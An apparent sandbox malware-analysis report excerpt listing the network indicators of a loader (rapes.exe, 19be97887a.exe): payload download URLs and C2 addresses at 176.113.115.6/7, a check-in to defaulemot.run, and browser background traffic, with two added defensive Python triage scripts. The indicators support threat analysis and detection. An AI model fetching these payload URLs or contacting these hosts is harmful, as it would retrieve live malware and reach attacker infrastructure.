Source: unknown | TCP traffic detected without corresponding DNS query: 23.60.201.147 (2 identical entries collapsed)
Source: unknown | TCP traffic detected without corresponding DNS query: 176.113.115.7 (43 identical entries collapsed, one per connection)
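The "TCP traffic detected without corresponding DNS query" entries are a simple heuristic with a good hit rate against hard-coded C2: an address embedded in the binary never appears in a DNS answer, so a connection to it has no preceding resolution. The Python below is an added example, not Joe Sandbox code, that applies that check to a constructed event stream and ranks the unresolved destinations by connection count. The resolved addresses use the 203.0.113.0/24 documentation range and are made up; the unresolved ones (176.113.115.6, 176.113.115.7, 2.19.104.63) are taken from the report. The `known_background` parameter is this example's own convention for prefixes an analyst has already attributed to OS or CDN traffic; the report does not attribute any of these addresses and neither does the code.

```python
"""Flag TCP connections whose destination no earlier DNS answer produced.

Added example (not Joe Sandbox code): a minimal form of the report's
"TCP traffic detected without corresponding DNS query" check, run over a
constructed, time-ordered event stream.
"""
from collections import defaultdict

# Constructed event stream in time order.
#   ("dns", qname, [answer_ips])   a DNS response observed on the wire
#   ("tcp", dst_ip, dst_port)      a TCP connection attempt
# Resolved addresses are from the 203.0.113.0/24 documentation range (made up);
# the unresolved ones are raw IPs listed in the report.
EVENTS = [
    ("dns", "detectportal.firefox.com", ["203.0.113.10"]),
    ("tcp", "203.0.113.10", 80),
    ("tcp", "176.113.115.7", 80),
    ("tcp", "176.113.115.6", 80),
    ("tcp", "2.19.104.63", 443),
    ("tcp", "203.0.113.30", 443),                 # connect BEFORE the answer arrives
    ("dns", "cdn.example", ["203.0.113.30"]),
    ("dns", "www.google.com", ["203.0.113.20", "203.0.113.21"]),
    ("tcp", "203.0.113.21", 443),
    ("tcp", "176.113.115.7", 80),
    ("tcp", "176.113.115.7", 80),
]


def dnsless_connections(events, known_background=()):
    """Return {ip: {"count": n, "ports": [...]}} for TCP connects to an address
    that was not in any DNS answer seen EARLIER in the stream.

    known_background: prefixes the analyst already attributes to OS/CDN noise
    (assumption of this example; nothing here decides what is benign).
    """
    resolved = set()
    hits = defaultdict(lambda: {"count": 0, "ports": set()})
    for ev in events:
        if ev[0] == "dns":
            resolved.update(ev[2])
        elif ev[0] == "tcp":
            _, ip, port = ev
            # str.startswith(()) is False, so an empty allowlist skips nothing
            if ip in resolved or ip.startswith(tuple(known_background)):
                continue
            hits[ip]["count"] += 1
            hits[ip]["ports"].add(port)
    return {ip: {"count": v["count"], "ports": sorted(v["ports"])}
            for ip, v in hits.items()}


def rank(hits):
    """Most-contacted unresolved destination first; ties broken by address."""
    return sorted(hits.items(), key=lambda kv: (-kv[1]["count"], kv[0]))


if __name__ == "__main__":
    for ip, info in rank(dnsless_connections(EVENTS)):
        print(f"{ip:16} {info['count']:3} connections, ports {info['ports']}")
```

Ordering matters: the check is "no answer before the connection", not "no answer at all", which is why 203.0.113.30 is flagged in the sample even though a later response names it. In a real capture that edge case usually means the resolution happened on another host or outside the capture window, and it is worth a second look rather than an automatic dismissal.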
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 28_2_004405B0 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile | 28_2_004405B0
Source: global traffic | HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1 | Host: www.google.com | Connection: keep-alive | X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiKo8sBCIWgzQEI59DNAQi91c4BCIDWzgEIvODOAQiu5M4BCIvlzgEY4eLOAQ== | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1 | Host: www.google.com | Connection: keep-alive | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 | Host: www.google.com | Connection: keep-alive | X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiKo8sBCIWgzQEI59DNAQi91c4BCIDWzgEIvODOAQiu5M4BCIvlzgEY4eLOAQ== | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /async/newtab_promos HTTP/1.1 | Host: www.google.com | Connection: keep-alive | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | Sec-Fetch-Storage-Access: active | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0 HTTP/1.1 | Host: apis.google.com | Connection: keep-alive | sec-ch-ua-platform: "Windows" | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | sec-ch-ua-mobile: ?0 | Accept: */* | X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiKo8sBCIWgzQEY4eLOAQ== | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: script | Sec-Fetch-Storage-Access: active | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 176.113.115.7 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1 | Cache-Control: max-age = 3000 | Connection: Keep-Alive | Accept: */* | If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT | User-Agent: Microsoft-CryptoAPI/10.0 | Host: c.pki.goog
Source: global traffic | HTTP traffic detected: GET /r/r4.crl HTTP/1.1 | Cache-Control: max-age = 3000 | Connection: Keep-Alive | Accept: */* | If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT | User-Agent: Microsoft-CryptoAPI/10.0 | Host: c.pki.goog
Source: global traffic | HTTP traffic detected: GET /files/7222648325/2qv26zF.exe HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: GET /luma/random.exe HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: GET /steam/random.exe HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: GET /well/random.exe HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: GET /off/random.exe HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Connection: Keep-Alive | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: GET /test/exe/random.exe HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 176.113.115.7 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /test/am_no.bat HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: GET /files/teamex_support/random.exe HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 176.113.115.7 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /canonical.html HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Cache-Control: no-cache | Pragma: no-cache | Connection: keep-alive
Source: global traffic | HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | Connection: keep-alive | Pragma: no-cache | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 176.113.115.7 | Connection: Keep-Alive
(The /canonical.html and /success.txt?ipv4 pair to detectportal.firefox.com above repeats 13 more times, identical in every header; 14 occurrences of each in total. These are Firefox's captive-portal checks, not sample traffic, and the repeats are collapsed here.)
Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 176.113.115.7 | Connection: Keep-Alive
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://pixel.advertising.com/firefox-etp*://pubads.g.doubleclick.net/gampad/*xml_vmap2**://*.adsafeprotected.com/services/pub**://*.adsafeprotected.com/jload?**://pubads.g.doubleclick.net/gampad/*xml_vmap1**://*.adsafeprotected.com/*/Serving/**://www.facebook.com/platform/impression.php*color-mix(in srgb, currentColor 9%, transparent)resource://gre/modules/CrashMonitor.sys.mjs equals www.facebook.com (Facebook)
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://track.adform.net/serving/scripts/trackpoint/pictureinpicture%40mozilla.org:1.0.0*://www.rva311.com/static/js/main.*.chunk.js*://connect.facebook.net/*/all.js*@mozilla.org/network/atomic-file-output-stream;1FileUtils_closeAtomicFileOutputStreamresource://gre/modules/FileUtils.sys.mjs@mozilla.org/addons/addon-manager-startup;1webcompat-reporter@mozilla.org.xpi*://www.google-analytics.com/gtm/js**://www.google-analytics.com/plugins/ua/ec.js*://www.google-analytics.com/analytics.js**://imasdk.googleapis.com/js/sdkloader/ima3.js*://static.adsafeprotected.com/iasPET.1.js*://ssl.google-analytics.com/ga.js*://www.googletagservices.com/tag/js/gpt.js**://*.moatads.com/*/moatheader.js**://www.googletagmanager.com/gtm.js**://adservex.media.net/videoAds.js**://cdn.optimizely.com/public/*.js*://*.vidible.tv/*/vidible-min.js**://js.maxmind.com/js/apis/geoip2/*/geoip2.js*://s0.2mdn.net/instream/html5/ima3.js*://pagead2.googlesyndication.com/tag/js/gpt.js**://cdn.adsafeprotected.com/iasPET.1.js*://s.webtrends.com/js/webtrends.js*://s.webtrends.com/js/webtrends.min.js*://s.webtrends.com/js/advancedLinkTracking.jsresource://gre/modules/DeferredTask.sys.mjs equals www.facebook.com (Facebook)
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: devtools/client/framework/devtools@mozilla.org/dom/slow-script-debug;1Failed to listen. Callback argument missing.resource://devtools/shared/security/socket.jsDevToolsStartup.jsm:handleDebuggerFlagNo callback set for this channel.browser.fixup.dns_first_for_single_wordsreleaseDistinctSystemPrincipalLoaderdevtools.debugger.remote-websocket{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}browser.urlbar.dnsResolveFullyQualifiedNamesJSON Viewer's onSave failed in startPersistencedevtools.performance.popup.feature-flagFailed to listen. Listener already attached.Failed to execute WebChannel callback:@mozilla.org/network/protocol;1?name=file^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)devtools/client/framework/devtools-browserdevtools.performance.recording.ui-base-url^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?@mozilla.org/network/protocol;1?name=defaultWebChannel/this._originCheckCallback@mozilla.org/uriloader/handler-service;1^([a-z+.-]+:\/{0,3})*([^\/@]+@).+resource://devtools/server/devtools-server.jsbrowser.fixup.domainsuffixwhitelist.Unable to start devtools server on get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPGot invalid request to save JSON dataget FIXUP_FLAGS_MAKE_ALTERNATE_URIDevTools telemetry entry point failed: resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/NetUtil.sys.mjsget FIXUP_FLAG_FORCE_ALTERNATE_URIhttp://poczta.interia.pl/mh/?mailto=%sCan't invoke URIFixup in the content processresource://gre/modules/DeferredTask.sys.mjs@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/dbus-handler-app;1resource://gre/modules/FileUtils.sys.mjshttp://www.inbox.lv/rfc2368/?value=%shttps://mail.inbox.lv/compose?to=%s@mozilla.org/network/file-input-stream;1_finalizeInternal/this._finalizePromise<extractScheme/fixupChangedProtocol<_injectDefaultProtocolHandlersIfNeededisDownloadsImprovementsAlreadyMigratedresource://gre/modules/ExtHandlerService.sys.mjsresource://gre/modules/JSONFile.sys.mjsScheme should be either http or httpshandlerSvc fillHandlerInfo: don't know this typegecko.handlerService.defaultHandlersVersionhttp://win.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/URIFixup.sys.mjs{33d75835-722f-42c0-89cc-44f328e56a86}{c6cf88b7-452e-47eb-bdc9-86e3561648ef}@mozilla.org/uriloader/web-handler-app;1resource://gre/modules/FileUtils.sys.mjshttps://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/JSONFile.sys.mjshttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://mail.yahoo.co.jp/compose/?To=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%sMust have a source and a callback@mozilla.org/network/simple-stream-listener;1newChannel requires a single object argumentSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLFirst argument should be an nsIInputStream@mozilla.org/network/input-stream-pump;1Non-zero amount of bytes must be specified@mozilla.org/intl/converter-input-stream;1https://mail.yandex.ru/compose?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.inbox.lv/compose?to=%spdfjs.prev
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: onPrefEnabledChanged() - removing gmp directory @mozilla.org/network/safe-file-output-stream;1resource://gre/modules/addons/XPIProvider.jsm*://www.everestjs.net/static/st.v3.js**://cdn.branch.io/branch-latest.min.js**://auth.9c9media.ca/auth/main.js*://c.amazon-adsystem.com/aax2/apstag.jswebcompat-reporter%40mozilla.org:1.5.1*://pub.doubleverify.com/signals/pub.js**://static.chartbeat.com/js/chartbeat.jsFileUtils_openSafeFileOutputStreamhttps://smartblock.firefox.etp/facebook.svg*://static.criteo.net/js/ld/publishertag.jshttps://smartblock.firefox.etp/play.svg*://*.imgur.com/js/vendor.*.bundle.js*://*.imgur.io/js/vendor.*.bundle.js@mozilla.org/network/file-output-stream;1*://static.chartbeat.com/js/chartbeat_video.js*://web-assets.toggl.com/app/assets/scripts/*.js*://libs.coremetrics.com/eluminate.js*://connect.facebook.net/*/sdk.js*FileUtils_openAtomicFileOutputStreamFileUtils_closeSafeFileOutputStreamresource://gre/modules/ConduitsParent.sys.mjs equals www.facebook.com (Facebook)
                      Source: global trafficDNS traffic detected: DNS query: defaulemot.run
                      Source: global trafficDNS traffic detected: DNS query: www.google.com
                      Source: global trafficDNS traffic detected: DNS query: apis.google.com
                      Source: global trafficDNS traffic detected: DNS query: play.google.com
                      Source: global trafficDNS traffic detected: DNS query: youtube.com
                      Source: global trafficDNS traffic detected: DNS query: detectportal.firefox.com
                      Source: global trafficDNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
                      Source: global trafficDNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
                      Source: global trafficDNS traffic detected: DNS query: contile.services.mozilla.com
                      Source: global trafficDNS traffic detected: DNS query: spocs.getpocket.com
                      Source: global trafficDNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
                      Source: global trafficDNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
                      Source: global trafficDNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
                      Source: global trafficDNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
                      Source: global trafficDNS traffic detected: DNS query: shavar.services.mozilla.com
                      Source: global trafficDNS traffic detected: DNS query: shavar.prod.mozaws.net
                      Source: global trafficDNS traffic detected: DNS query: example.org
                      Source: global trafficDNS traffic detected: DNS query: ipv4only.arpa
                      Source: global trafficDNS traffic detected: DNS query: push.services.mozilla.com
                      Source: global trafficDNS traffic detected: DNS query: firefox.settings.services.mozilla.com
                      Source: global trafficDNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
                      Source: global trafficDNS traffic detected: DNS query: www.youtube.com
                      Source: global trafficDNS traffic detected: DNS query: www.facebook.com
                      Source: global trafficDNS traffic detected: DNS query: www.wikipedia.org
                      Source: global trafficDNS traffic detected: DNS query: star-mini.c10r.facebook.com
                      Source: global trafficDNS traffic detected: DNS query: dyna.wikimedia.org
                      Source: global trafficDNS traffic detected: DNS query: youtube-ui.l.google.com
                      Source: global trafficDNS traffic detected: DNS query: www.reddit.com
                      Source: global trafficDNS traffic detected: DNS query: twitter.com
                      Source: global trafficDNS traffic detected: DNS query: reddit.map.fastly.net
                      Source: global trafficDNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
                      Source: global trafficDNS traffic detected: DNS query: begindecafer.world
                      Source: global trafficDNS traffic detected: DNS query: support.mozilla.org
                      Source: global trafficDNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
                      Source: unknownHTTP traffic detected: POST /jUSiaz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: defaulemot.run
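The network section above mixes the loader's own infrastructure (the 176.113.115.6/7 URLs held by rapes.exe and 19be97887a.exe, the DNS query and POST /jUSiaz check-in to defaulemot.run) with a large amount of Firefox and Windows background traffic (mozilla.org, mozgcp.net, digicert.com, google.com). The following Python script is an added example, not part of the Joe Sandbox report or its tooling: it parses report lines of the shape shown here, extracts hosts from the "String found in binary or memory", "DNS query" and "HTTP traffic detected" entries, records which processes held each URL, and applies an assumed triage rule with an assumed allowlist of benign suffixes. The sample lines are constructed copies of entries from this section with shortened memory-dump identifiers; the trailing "0" on two strings reproduces the memory-scan artifact visible in the report (random.exe0, random.exec97d7u, .crt0B), where bytes adjacent to the real string in the dump get glued onto it.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample in the shape of the report lines above (dump ids shortened).
SAMPLE_LINES = [
    "Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DCF000.sdmp"
    "String found in binary or memory: http://176.113.115.6/Ni9kiput/index.php",
    "Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.sdmp"
    "String found in binary or memory: http://176.113.115.7/files/teamex_support/random.exe0",
    "Source: powershell.exe, 0000000F.00000002.956232423.0000024D819CA000.sdmp, "
    "19be97887a.exe, 0000001E.00000003.1999887350.0000000000D60000.sdmp"
    "String found in binary or memory: http://176.113.115.7/mine/random.exe",
    "Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.sdmp"
    "String found in binary or memory: https://accounts.firefox.com/settings/clients",
    "Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.sdmp"
    "String found in binary or memory: http://ocsp.digicert.com0",
    "Source: firefox.exe, 00000034.00000002.1980859392.000001F912D6B000.sdmp"
    "String found in binary or memory: http://127.0.0.1:",
    "Source: global trafficDNS traffic detected: DNS query: defaulemot.run",
    "Source: global trafficDNS traffic detected: DNS query: shavar.services.mozilla.com",
    "Source: global trafficDNS traffic detected: DNS query: begindecafer.world",
    "Source: unknownHTTP traffic detected: POST /jUSiaz HTTP/1.1Connection: Keep-Alive"
    "Content-Type: application/x-www-form-urlencodedContent-Length: 51Host: defaulemot.run",
]

STRING_RE = re.compile(r"^Source: (?P<hdr>.*?)String found in binary or memory: (?P<value>.*)$")
PROC_RE = re.compile(r"([\w.-]+\.exe)(?=, [0-9A-Fa-f]{8}\.)")  # process names in the header
DNS_RE = re.compile(r"DNS traffic detected: DNS query: (?P<host>[A-Za-z0-9.-]+)")
HTTP_RE = re.compile(
    r"HTTP traffic detected: (?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01].*?Host: (?P<host>[A-Za-z0-9.-]+)"
)
# Host is either a dotted IPv4 or labels ending in an alphabetic TLD, so a glued
# trailing digit ("ocsp.digicert.com0") is left out of the host. Glued bytes in
# the path ("random.exe0") cannot be told apart from a real path and are kept.
URL_RE = re.compile(
    r"https?://(?P<host>\d{1,3}(?:\.\d{1,3}){3}|(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,})"
    r"(?::\d+)?(?P<path>/[^\s\"'<>]*)?"
)
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")

# Assumed allowlist: suffixes the sandbox's own browser and OS components talk to.
BENIGN_SUFFIXES = (
    "mozilla.org", "mozilla.com", "mozilla.net", "mozgcp.net", "mozaws.net",
    "firefox.com", "getpocket.com", "google.com", "googleapis.com",
    "digicert.com", "lencr.org", "amazontrust.com", "microsoft.com",
)
BROWSER_PROCS = {"firefox.exe"}  # assumed: URLs only seen in the browser are noise


def is_allowlisted(host):
    return any(host == s or host.endswith("." + s) for s in BENIGN_SUFFIXES)


def classify(host, entry):
    """Assumed triage rule: allowlist first; public IPs, observed traffic, or a
    URL held by a non-browser process are suspicious; DNS-only hosts need review."""
    if is_allowlisted(host):
        return "allowlisted"
    if IPV4_RE.fullmatch(host):
        ip = ipaddress.ip_address(host)
        return "local" if ip.is_loopback or ip.is_private else "suspicious"
    if entry["http"] or (entry["processes"] - BROWSER_PROCS):
        return "suspicious"
    return "review"


def collect_indicators(lines):
    """Return {host: {"processes", "urls", "dns", "http", "verdict"}} for the report lines."""
    hosts = defaultdict(lambda: {"processes": set(), "urls": set(), "dns": False, "http": set()})
    for line in lines:
        m = STRING_RE.match(line)
        if m:
            procs = set(PROC_RE.findall(m["hdr"]))
            for u in URL_RE.finditer(m["value"]):
                hosts[u["host"]]["processes"] |= procs
                hosts[u["host"]]["urls"].add(u.group(0))
            continue
        m = DNS_RE.search(line)
        if m:
            hosts[m["host"]]["dns"] = True
            continue
        m = HTTP_RE.search(line)
        if m:
            hosts[m["host"]]["http"].add(f"{m['method']} {m['path']}")
    for host, entry in hosts.items():
        entry["verdict"] = classify(host, entry)
    return dict(hosts)


def suspicious_hosts(indicators):
    return sorted(h for h, e in indicators.items() if e["verdict"] == "suspicious")


if __name__ == "__main__":
    ind = collect_indicators(SAMPLE_LINES)
    for host in sorted(ind):
        e = ind[host]
        print(f"{e['verdict']:<12} {host:<30} procs={sorted(e['processes'])} "
              f"dns={e['dns']} http={sorted(e['http'])}")
```

Two caveats follow from the data rather than the script. A domain that appears only as a DNS query (begindecafer.world here) stays at "review" because this section does not say which process resolved it; the verdict has to come from the C2 configuration and IDS sections elsewhere in the report. And the allowlist is a convenience for cutting browser noise, not evidence of benignity: a loader that staged on a legitimate CDN would be hidden by it, so keep the allowlist short and environment-specific.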
                      Source: firefox.exe, 00000034.00000002.1980859392.000001F912D6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.php
                      Source: powershell.exe, 0000000C.00000002.941241266.0000025642E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7
                      Source: 19be97887a.exe, 0000001E.00000003.1999887350.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000001C.00000002.2120033160.0000000000D7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/7222648325/2qv26zF.exe
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/7222648325/2qv26zF.exen
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000D7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/7222648325/2qv26zF.exeswsock.dll
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000001C.00000002.2120033160.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/teamex_support/random.exe
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/teamex_support/random.exe0
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/teamex_support/random.exec97d7u
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/luma/random.exec8
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/luma/random.exeh8
                      Source: powershell.exe, 0000000F.00000002.956232423.0000024D819CA000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1999887350.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1999887350.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/mine/random.exe
                      Source: 19be97887a.exe, 0000001E.00000003.1999887350.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/mine/random.exe4
                      Source: 19be97887a.exe, 0000001E.00000003.1999887350.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/mine/random.exenPack
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/off/random.exe
